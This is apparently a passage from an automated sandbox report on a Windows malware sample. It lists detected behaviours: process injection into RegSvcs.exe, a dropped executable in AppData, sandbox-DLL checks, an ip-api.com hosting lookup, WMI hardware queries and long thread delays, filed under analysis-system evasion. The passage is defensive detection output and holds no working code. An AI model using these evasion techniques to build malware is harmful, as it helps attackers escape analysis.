                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara match	File source: Process Memory Space: unjuridically.exe PID: 6948, type: MEMORYSTR
                Source: Yara match	File source: Process Memory Space: unjuridically.exe PID: 4564, type: MEMORYSTR
                Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	API/Special instruction interceptor: Address: CAFC1C
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	API/Special instruction interceptor: Address: 16D5FAC
                Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000003001000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599617
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599276
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599051
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598923
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598779
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598422
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598201
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598093
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596718
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596273
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596134
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595813
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595688
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594094
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599421
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599203
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599093
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598433
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598306
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598093
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597874
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597756
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597635
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597421
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594583
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594361
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593906
                Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2538
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7298
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2915
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Evaded block: after key decision	graph_0-94917
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Evaded block: after key decision
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes	graph_0-95619
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	API coverage: 4.6 %
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	API coverage: 4.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009C6CA9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_009C60DD
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_009C63F9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009CEB60
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009CF5FA
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009CF56F FindFirstFileW,FindClose,	0_2_009CF56F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009D1B2F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009D1C8A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009D1F94
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_00466CA9 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00466CA9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_004660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_004660DD
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_004663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_004663F9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_0046EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0046EB60
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_0046F56F FindFirstFileW,FindClose,	2_2_0046F56F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_0046F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0046F5FA
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_00471B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00471B2F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_00471C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00471C8A
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe	Code function: 2_2_00471F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00471F94
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe	Code function: 0_2_0099DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,	0_2_0099DDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599617
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599516
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599276
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599051
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598923
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598779
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598534
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598422
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598201
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598093
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597641
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596718
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596273
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596134
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595813
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595688
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595109
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594563
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594094
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599531
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599421
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599312
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599093Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
